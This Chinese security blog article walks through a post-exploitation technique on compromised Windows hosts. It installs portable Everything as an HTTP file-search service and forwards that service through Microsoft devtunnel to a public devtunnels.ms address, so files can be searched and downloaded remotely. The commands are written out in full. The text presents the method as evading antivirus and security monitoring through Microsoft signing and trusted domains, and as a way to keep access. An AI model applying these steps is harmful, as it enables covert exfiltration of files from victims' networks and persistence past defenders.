查看原文
其他

让后渗透中的Everything变得不再鸡肋

听风安全 2023-11-28

The following article is from 虫洞小窝安全团队 Author 哈梅斯

免责声明
由于传播、利用本公众号听风安全所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,公众号听风安全及作者不为承担任何责任,一旦造成后果请自行承担!如有侵权烦请告知,我们会立即删除并致歉。谢谢!

公众号现在只对常读和星标的公众号才展示大图推送,

建议大家把听风安全设为星标,否则可能就看不到啦!

----------------------------------------------------------------------

0x01 前言

我们在后渗透中,经常需要在拿下一台机器后,在一台机器建立据点,进行该台主机的敏感文件收集,例如配置文件,管理员放在桌面的密码本等等,或者说以这台机器为媒介,做一个在内网机器中,作为文件上传下载的机器,毕竟后渗透中,在内网中机器直接互相下载东西速度肯定是比从外面传进来更快,且隐秘性更好一些。此前会有师傅喜欢在拿下内网的机器中,用Everything起一个http服务器利用进行文件收集和互相下载文件等,但是这个姿势有个很大的缺点就是需要把端口转出来,或者需要自己在内网使用powershell的wget或者curl之类的命令进行文件下载,但是在安全设备监测严密的内网环境中,powershell通常会被禁用掉了,其他的下载姿势也不好多用,且根本不便携,最近想到了利用微软官方的 devtunnel开发隧道,直接将everyting起的端口转发出去,来让这一种后渗透中文件下载和搜索的姿势变的不再鸡肋,并且由于是微软官方的工具,天然具有免杀效果。

0x02 利用Everything起http服务搜索功能

这里有个坑点,一定要下载便携版的Everything,然后去设置,启用http服务器

应用保存即可

这时候会得到一个配置文件,将everything.ini,和便携版的everything一同上传到目标机器

然后安装 Client 服务

everything.exe -install-client-service

这样就在目标机器上开启了http服务,可以搜索、下载

0x03 利用devtunnel实现转发

可以去微软官网下载

这里需要登录绑定一下github账号,在实战中随便注册一个github就可以

devtunnel.exe user login -g -d

去绑定就好了

devtunnel.exe host -p 25005

https://xxxxxxx-xxxxxx.asse.devtunnels.ms/

这时候成功将25005端口转发到了该地址,我们直接在互联网访问便可以实现文件搜索和下载了

0x04 总结

优点:微软签名, 微软可信域名 ,websocket协议 ,天然自带免杀效果。


最主要是的将Everything这种搜索文件神器,在后渗透中发挥的更好了,并且起到了权限维持作用,即使丢了权限,只要这个服务还在,还能照样下载目标机器文件。 

缺点:需要登录,不过GitHub随便注册,倒是无所谓。



不可错过的往期推荐哦


从0到1深入浅出学习SQL注入

遇到的注入三例

实战之巧用验证码校验接口

U盘植马之基于arduino的badusb实现及思考

APT是如何杜绝软件包被篡改的

利用sqlserver agent job实现权限维持

SRC挖掘葵花宝典

点击下方名片,关注我们
觉得内容不错,就点下“”和“在看
如果不想错过新的内容推送可以设为星标
继续滑动看下一个

您可能也对以下帖子感兴趣

文章有问题?点此查看未经处理的缓存